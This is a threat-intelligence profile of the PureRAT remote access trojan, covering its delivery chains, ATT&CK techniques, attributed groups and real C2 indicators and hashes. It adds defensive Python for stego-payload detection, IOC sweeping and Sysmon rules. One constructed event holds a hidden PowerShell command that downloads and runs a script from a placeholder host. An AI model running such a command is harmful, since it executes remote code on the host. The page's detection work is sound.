Malware · Ransomware · Used by 3 actors

PureRAT

PureRAT is a .NET-based remote access trojan/backdoor used in multiple criminal intrusion campaigns. Public reporting describes it as a sophisticated, multi-stage, largely fileless RAT that most commonly reaches Windows systems through phishing and fake-installer delivery chains. Observed initial access vectors include malicious LNK files that launch hidden PowerShell, ClickFix-style phishing flows, booking-themed phishing aimed at hotel staff, malicious XLL add-ins delivered in ZIP archives, and ISO/RAR-based lures posing as software or business documents. In several campaigns the payloads were hidden inside PNG images via steganography and loaded directly into memory rather than written to disk.
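A triage check for the PNG-carried payloads mentioned above, added here as an example and not taken from the cited reports: it looks for a long base64 run, or a raw overlay after the IEND chunk, that decodes to bytes with a valid MZ header whose e_lfanew points at a PE signature. The PNG and the inert PE-shaped header it scans are constructed inside the script; names such as find_embedded_pe and looks_like_pe are this example's own.

```python
"""Triage check for PE payloads smuggled inside PNG files (base64 text or raw
overlay). Added example; fixtures are constructed, not real samples."""
import base64
import binascii
import re
import struct
import zlib


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew (offset 0x3c) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Long base64 runs only; even a few hundred bytes of PE exceed this threshold,
# while PNG chunk data almost never forms 200 consecutive base64-alphabet bytes.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def find_embedded_pe(blob: bytes) -> list:
    """Return (method, offset) for every embedded PE found in a PNG-like blob."""
    findings = []
    iend = blob.find(b"IEND")
    if iend != -1 and looks_like_pe(blob[iend + 8:]):      # 'IEND' + 4-byte CRC
        findings.append(("raw-overlay", iend + 8))
    for m in B64_RUN.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except binascii.Error:                              # not valid base64 after all
            continue
        if looks_like_pe(decoded):
            findings.append(("base64", m.start()))
    return findings


# --- constructed fixtures (assumption: this is how such a file would look) ---
def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 RGB PNG carrying no payload."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")               # filter byte + one RGB pixel
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def fake_pe() -> bytes:
    """Inert bytes shaped like a PE header; not executable, for testing only."""
    hdr = bytearray(512)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3c, 0x80)                 # e_lfanew -> 0x80
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


def stego_png_base64() -> bytes:
    """PNG with the payload appended as base64 text, as the reports describe."""
    return minimal_png() + base64.b64encode(fake_pe())


def stego_png_overlay() -> bytes:
    """PNG with the raw PE appended after IEND (the cruder variant)."""
    return minimal_png() + fake_pe()


if __name__ == "__main__":
    for name, png in (("clean", minimal_png()), ("base64", stego_png_base64()),
                      ("overlay", stego_png_overlay())):
        print(name, find_embedded_pe(png))
```

Run it over a directory of image files pulled from a suspect host and review every hit; a genuine hit should then be carved and hashed for comparison against the SHA-256 list on this page.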

Behaviors and capabilities described in public reporting include PowerShell-based staging, host fingerprinting and system-information collection, download of additional payloads, persistence via scheduled tasks, registry Run keys and Startup-folder shortcuts, and in some cases DLL side-loading through AddInProcess32.exe for in-memory execution. Evasion and anti-analysis techniques include obfuscated VBScript/PowerShell stages, anti-VM checks for VMware and QEMU, UAC bypass via cmstp.exe, process hollowing into msbuild.exe, .NET Reactor/Themida protection, and fileless in-memory assembly loading. The reported plugin modules provide keylogging, on-demand credential theft, remote desktop access and control, desktop image capture, active-window monitoring, mouse and keyboard emulation, and microphone/webcam monitoring.

Public reporting ties PureRAT to several threat operations. Sekoia identified it as the core malware in the "I Paid Twice" hospitality campaign, which abused compromised Booking.com accounts and ClickFix redirection to steal hotel-platform credentials. Microsoft Defender reporting likewise references Booking-themed phishing aimed at hotel staff that drops PureRAT to steal Booking.com logins. BI.ZONE reported Fluffy Wolf using PureRAT in phishing campaigns against Russian organizations in construction, consulting, manufacturing, engineering, retail, e-commerce and industry, alongside PureLogs and Pay2Key; BI.ZONE also observed a newer PureRAT build with the PluginRemoteDesktop module in attacks on Russian organizations. Kaspersky described a separate group that targets Russian educational institutions and energy, finance, government and diplomatic entities, previously used PureRAT, and delivered it via malicious XLL chains. Elastic linked REF1695 to ISO-based fake-installer campaigns deploying PureRAT alongside CNB Bot, PureMiner, custom XMRig loaders and SilentCryptoMiner. Breakglass Intelligence tied PureRAT to a broader cybercrime infrastructure cluster overlapping with ResolverRAT, PureHVNC and PureLogs.

High-confidence indicators and infrastructure reported for PureRAT include crixup[.]com, instantservices1[.]ddnsguru[.]com, and 178.16.52[.]58 over port 1917, plus additional PureRAT-related infrastructure: windirautoupdates[.]top, winautordr.itemdb[.]com, winautordr.ydns[.]eu, winautordr.kozow[.]com, system-update-cloud[.]store, 64.20.56[.]185 and 45.14.245[.]145. One report gives 4782 as PureRAT's default port; a connection to that port by itself is a weak signal and should be corroborated with one of the listed hosts or hashes before escalation. SHA-256 hashes associated with PureRAT activity: 7d22c61e8aafc9a2a812cafe7720922ab12d770e5af7d92527d9b0dbd6e10f30, 96b4713c6b9e5283f9d2f570a51edce66fc44ced2ae130b65dbe1326690a27eb, 40bd37eba7f9a56516c96092d5c6d50937fc4df00baf79155ada9d1673389830, 121ae6c664aaef9ed2e44ed04c66e1cabcb00295c48289afd9e23126fc6edadf, 96d4e77c0d433b14c2030be194ad12e159b5292f33da3a7d4d2749475845c253, bb1075ca2ff0a9b5e407fb396f8f87705d8f512b42b3f4326586ef17fed8aabb, and e0c0418d8bad7b4731b7de35059c6a51c49825e6ec841193cd8842220957cff9.
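The indicators above, refanged and swept against log lines, as an added example that is not Mallory's matching engine. The log lines are constructed; refang, build_index, match_line and sweep are this example's own names. A hit on port 4782 without a listed host is reported as "port-only" to reflect the caveat that the default port alone is a weak indicator.

```python
"""Refang the PureRAT indicators published on this page and sweep log lines
for them. Added example; SAMPLE_LOGS are constructed, not from an incident."""
import re

# Indicators exactly as quoted on this page (defanged).
PURERAT_IOCS = {
    "domains": [
        "crixup[.]com", "instantservices1[.]ddnsguru[.]com",
        "windirautoupdates[.]top", "winautordr.itemdb[.]com",
        "winautordr.ydns[.]eu", "winautordr.kozow[.]com",
        "system-update-cloud[.]store",
    ],
    "ips": ["178.16.52[.]58", "64.20.56[.]185", "45.14.245[.]145"],
    "ports": [1917, 4782],   # 1917 seen with 178.16.52.58; 4782 is the reported default
    "sha256": [
        "7d22c61e8aafc9a2a812cafe7720922ab12d770e5af7d92527d9b0dbd6e10f30",
        "96b4713c6b9e5283f9d2f570a51edce66fc44ced2ae130b65dbe1326690a27eb",
        "40bd37eba7f9a56516c96092d5c6d50937fc4df00baf79155ada9d1673389830",
        "121ae6c664aaef9ed2e44ed04c66e1cabcb00295c48289afd9e23126fc6edadf",
        "96d4e77c0d433b14c2030be194ad12e159b5292f33da3a7d4d2749475845c253",
        "bb1075ca2ff0a9b5e407fb396f8f87705d8f512b42b3f4326586ef17fed8aabb",
        "e0c0418d8bad7b4731b7de35059c6a51c49825e6ec841193cd8842220957cff9",
    ],
}


def refang(value: str) -> str:
    """Undo common defanging so indicators compare against real telemetry."""
    return (value.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def build_index(iocs: dict) -> dict:
    return {
        "domain": {refang(d).lower() for d in iocs["domains"]},
        "ip": {refang(i) for i in iocs["ips"]},
        "port": set(iocs["ports"]),
        "sha256": {h.lower() for h in iocs["sha256"]},
    }


DOMAIN_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)
IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?(?![\d.])")
SHA256_RE = re.compile(r"(?<![0-9a-f])([0-9a-f]{64})(?![0-9a-f])", re.I)


def match_line(line: str, index: dict) -> list:
    """Return (kind, value) hits for one log line. 'port-only' is low confidence."""
    hits = []
    for dom in (d.lower() for d in DOMAIN_RE.findall(line)):
        for ioc in index["domain"]:                 # exact match or a subdomain of it
            if dom == ioc or dom.endswith("." + ioc):
                hits.append(("domain", ioc))
    for ip, port in IP_RE.findall(line):
        if ip in index["ip"]:
            hits.append(("ip", ip))
        if port and int(port) in index["port"]:
            kind = "ip+port" if ip in index["ip"] else "port-only"
            hits.append((kind, f"{ip}:{port}"))
    for h in SHA256_RE.findall(line):
        if h.lower() in index["sha256"]:
            hits.append(("sha256", h.lower()))
    return hits


def sweep(lines, index: dict) -> list:
    """(line_number, hit) for every hit across the given lines."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in match_line(line, index)]


SAMPLE_LOGS = [   # constructed DNS / flow / EDR lines, not real telemetry
    "2026-05-02T10:14:03Z dns src=10.0.0.23 qname=crixup.com type=A",
    "2026-05-02T10:14:05Z conn src=10.0.0.23 dst=178.16.52.58:1917 proto=tcp",
    "2026-05-02T10:14:06Z conn src=10.0.0.23 dst=8.8.8.8:53 proto=udp",
    "2026-05-02T10:15:11Z conn src=10.0.0.41 dst=203.0.113.9:4782 proto=tcp",
    "2026-05-02T10:16:40Z dns src=10.0.0.41 qname=cdn.winautordr.kozow.com type=A",
    "2026-05-02T10:17:02Z file_create host=WS-41 path=C:\\Users\\u\\AppData\\Roaming\\svc.exe "
    "sha256=7D22C61E8AAFC9A2A812CAFE7720922AB12D770E5AF7D92527D9B0DBD6E10F30",
]

if __name__ == "__main__":
    for n, hit in sweep(SAMPLE_LOGS, build_index(PURERAT_IOCS)):
        print(n, *hit)
```

Subdomain matching is deliberate (a sighting of cdn.winautordr.kozow.com should hit winautordr.kozow.com), and hashes are compared case-insensitively because EDR exports differ in case.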


THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers.
Fluffy Wolf

These scripts systematically deploy the final payloads, which include the notorious Pay2Key ransomware, the PureLogs information stealer, and the PureRAT trojan.

via securityonline.info

REF1695

However, instead of the promised software, a series of loaders installs a malicious toolkit including CNB Bot, PureRAT, and SilentCryptoMiner.

via hackread.com

Greedy Sponge

Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate

via cloudatg.com
MITRE ATT&CK

Techniques & procedures

30 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques

T1566 Phishing (evidence: 5)

An active phishing campaign has been targeting hotel and other hospitality organizations across Europe and Asia since April 2026... Phishing emails carry the display name "Booking Manager (via Calendly)" and reference guest complaints, bedbug infestations, room inquiries, health inspections, and stay reviews.

T1566.001 Spearphishing Attachment (evidence: 2)

In 2026 the attacks began with a phishing email carrying a ZIP archive that contained an XLL file. The file masqueraded as a legitimate Microsoft Excel add-in.

T1566.002 Spearphishing Link (evidence: 2)

...while in other cases the victim was given a link to a GitHub repository from which a RAR archive was downloaded. According to the researchers, Fluffy Wolf makes heavy use of GitHub because such links look legitimate and help evade mail filters...

Execution

7 techniques

T1053.005 Scheduled Task (evidence: 1)

before copying itself and establishing a Task Scheduler job for persistence

T1059.001 PowerShell (evidence: 2)

Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.

T1059.003 Windows Command Shell (evidence: 1)

When the archive is launched, all of its files are unpacked into a temporary directory. A batch file then runs, prepares the interpreter and the script, and launches the latter.

T1059.005 Visual Basic (evidence: 1)

downloads a heavily obfuscated VBS file to circumvent detection

T1059.010 AutoHotKey & AutoIT (evidence: 1)

When the archive is launched, all of its files are unpacked into a temporary directory. A batch file then runs, prepares the interpreter and the script, and launches the latter. The 1.5 MB AutoIt script contains the malicious payload...

T1204 User Execution (evidence: 1)

When users land on ClickFix pages, they encounter Booking.com brand elements alongside a reCAPTCHA interface prompting them to copy commands.

T1204.002 Malicious File (evidence: 2)

Double-clicking it launched Excel, which loaded the executable DLL into its own process, resulting in execution of the malicious code.

Persistence

3 techniques

T1053.005 Scheduled Task (evidence: 1)

before copying itself and establishing a Task Scheduler job for persistence

T1547.001 Registry Run Keys / Startup Folder (evidence: 2)

Dual Run (Node.js) + RunOnce (ProgramData EXE)

T1547.009 Shortcut Modification (evidence: 1)

Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.

Privilege Escalation

4 techniques

T1053.005 Scheduled Task (evidence: 1)

before copying itself and establishing a Task Scheduler job for persistence

T1055 Process Injection (evidence: 2)

To remain hidden, the threat actors inject these payloads into trusted Windows processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe.

T1547.001 Registry Run Keys / Startup Folder (evidence: 2)

Dual Run (Node.js) + RunOnce (ProgramData EXE)

T1547.009 Shortcut Modification (evidence: 1)

Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.

Defense Evasion

6 techniques

T1055 Process Injection (evidence: 2)

To remain hidden, the threat actors inject these payloads into trusted Windows processes such as RegAsm.exe, InstallUtil.exe, and MSBuild.exe.

T1140 Deobfuscate/Decode Files or Information (evidence: 1)

fetch a PNG file with a base64-encoded PE payload and another PNG file, whose decoded assembly is directly loaded into memory

T1218 System Binary Proxy Execution (evidence: 1)

The .exe binary triggers DLL side-loading using AddInProcess32.exe, a legitimate Windows component designed to host COM add-ins.

T1218.009 Regsvcs/Regasm (evidence: 1)

The script decrypts the file, starts the RegAsm.exe process and injects the malicious payload into that process.

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Multiple VMware and QEMU virtual machine environment checks are then conducted

T1620 Reflective Code Loading (evidence: 1)

whose decoded assembly is directly loaded into memory

Credential Access

3 techniques

T1003 OS Credential Dumping (evidence: 1)

Additional plugins have also allowed keylogging, on-demand credential theft

T1056 Input Capture (evidence: 2)

This dangerous plug-in drastically expands the attackers' control, allowing them to ... manipulate mouse and keyboard input remotely.

T1056.001 Keylogging (evidence: 1)

Additional plugins have also allowed keylogging

Discovery

2 techniques

T1082 System Information Discovery (evidence: 2)

The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.

T1497 Virtualization/Sandbox Evasion (evidence: 1)

Multiple VMware and QEMU virtual machine environment checks are then conducted

Collection

4 techniques

T1056 Input Capture (evidence: 2)

This dangerous plug-in drastically expands the attackers' control, allowing them to ... manipulate mouse and keyboard input remotely.

T1056.001 Keylogging (evidence: 1)

Additional plugins have also allowed keylogging

T1113 Screen Capture (evidence: 1)

This dangerous plug-in drastically expands the attackers' control, allowing them to seamlessly capture desktop images...

T1560 Archive Collected Data (evidence: 1)

The Putty.exe file is a self-extracting CAB archive... inside which are an AutoIt interpreter and its script, split across several files, together with a batch file.

Command and Control

6 techniques

T1008 Fallback Channels (evidence: 1)

22 C2 IPs, 8 domains, 10+ port options

T1071 Application Layer Protocol (evidence: 1)

The infrastructure commonly supports ransomware command and control (C2) servers, malware distribution, phishing campaigns, botnet management, and data exfiltration staging.

T1071.001 Web Protocols (evidence: 1)

HTTPS C2 with certificate pinning

T1105 Ingress Tool Transfer (evidence: 6)

Once PowerLoader infiltrates a target host, it spawns hidden PowerShell instances to retrieve additional malicious scripts directly from the command-and-control (C2) server. These scripts systematically deploy the final payloads...

T1219 Remote Access Tools (evidence: 4)

For the very first time in attacks against Russian enterprises, the threat actors deployed "PluginRemote Desktop" for PureRAT... allowing them to seamlessly capture desktop images, monitor active windows, and even manipulate mouse and keyboard input remotely.

T1571 Non-Standard Port (evidence: 1)

Ports 56001, 4782, 1337, 7777, 9090
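The host tradecraft catalogued in the technique list above (hidden PowerShell launched from an LNK or ClickFix paste, scheduled-task and Run-key persistence, LNK drops in the Startup folder, a relocated AddInProcess32.exe for side-loading, RegAsm/InstallUtil/MSBuild started as hollowing hosts, cmstp.exe from a script host) expressed as detection logic over Sysmon-style events. This is an added example with rules written for this page, not a vendor or Mallory signature; the events are constructed, and the field names (EventID, Image, ParentImage, CommandLine, TargetObject, TargetFilename) follow Sysmon's schema for event IDs 1, 11 and 13.

```python
"""Detection rules for the PureRAT host behaviours described above, evaluated
over constructed Sysmon-style events. Added example; rules and paths are
illustrative, not a vendor signature."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "mshta.exe"}
INJECTION_TARGETS = {"regasm.exe", "installutil.exe", "msbuild.exe", "regsvcs.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
# -w hidden / -WindowStyle Hidden, or an encoded command (-e, -enc, -EncodedCommand)
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s", re.I)
# strip the (possibly quoted) image token to get the argument string
ARGS_RE = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', re.S)


def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def check_process(ev):                       # Sysmon EventID 1
    img, parent = base(ev["Image"]), base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    m = ARGS_RE.match(cmd)
    args = m.group(1).strip() if m else ""
    if img in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" and HIDDEN_PS.search(cmd):
        yield "hidden_powershell_from_explorer"          # LNK / ClickFix launch (T1059.001)
    if img == "schtasks.exe" and "/create" in cmd.lower() and parent in SCRIPT_HOSTS:
        yield "schtasks_create_from_script_host"         # T1053.005
    if img in INJECTION_TARGETS and parent in SCRIPT_HOSTS and not args:
        yield "dotnet_utility_spawned_without_args"      # hollowing host (T1055 / T1218.009)
    if img == "addinprocess32.exe" and "\\microsoft.net\\" not in ev["Image"].lower():
        yield "addinprocess32_outside_dotnet_dir"        # side-loading copy (T1218)
    if img == "cmstp.exe" and parent in SCRIPT_HOSTS:
        yield "cmstp_from_script_host"                   # UAC bypass path


def check_file(ev):                          # Sysmon EventID 11
    target = ev.get("TargetFilename", "").lower()
    if target.endswith(".lnk") and "\\start menu\\programs\\startup\\" in target:
        yield "lnk_dropped_in_startup_folder"            # T1547.009


def check_registry(ev):                      # Sysmon EventID 13
    key = ev.get("TargetObject", "").lower()  # matches both ...\Run and ...\RunOnce
    if "\\currentversion\\run" in key and (base(ev["Image"]) in SCRIPT_HOSTS
                                           or in_user_writable(ev["Image"])):
        yield "run_key_set_by_script_or_userwritable_binary"   # T1547.001


CHECKS = {1: check_process, 11: check_file, 13: check_registry}


def scan(events) -> list:
    """Return (event_index, rule_name) for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for rule in CHECKS.get(ev["EventID"], lambda _ev: ())(ev):
            findings.append((i, rule))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [   # constructed; the URL is a placeholder in the .invalid TLD
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "iwr https://example.invalid/s.ps1 | iex"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": PS,
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\u\AppData\Roaming\upd.exe"},
    {"EventID": 13, "Image": r"C:\Users\u\AppData\Roaming\upd.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 11, "Image": PS,
     "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": PS, "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"EventID": 1, "Image": r"C:\Users\u\AppData\Roaming\AddInProcess32.exe",
     "ParentImage": r"C:\Users\u\AppData\Roaming\upd.exe",
     "CommandLine": r"C:\Users\u\AppData\Roaming\AddInProcess32.exe"},
    # benign controls: interactive PowerShell, and AddInProcess32 in its real home
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" /guid:1234'},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(idx, rule)
```

Tune the user-writable path list and the script-host set to your estate. The RegAsm/InstallUtil/MSBuild rule keys on an empty argument list because a hollowing target is created suspended with none, which legitimate build or install invocations almost never are; the AddInProcess32.exe rule keys on location rather than parent because the side-loading described above relies on a copy of the binary placed next to the malicious DLL.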

INDICATORS OF COMPROMISE

IOCs tracked for this family

93 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network: 50 tracked. IPs, domains, and DNS infrastructure linked to this family.

Hashes: 33 tracked. File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other: 10 tracked. Other indicator types observed in public reporting.
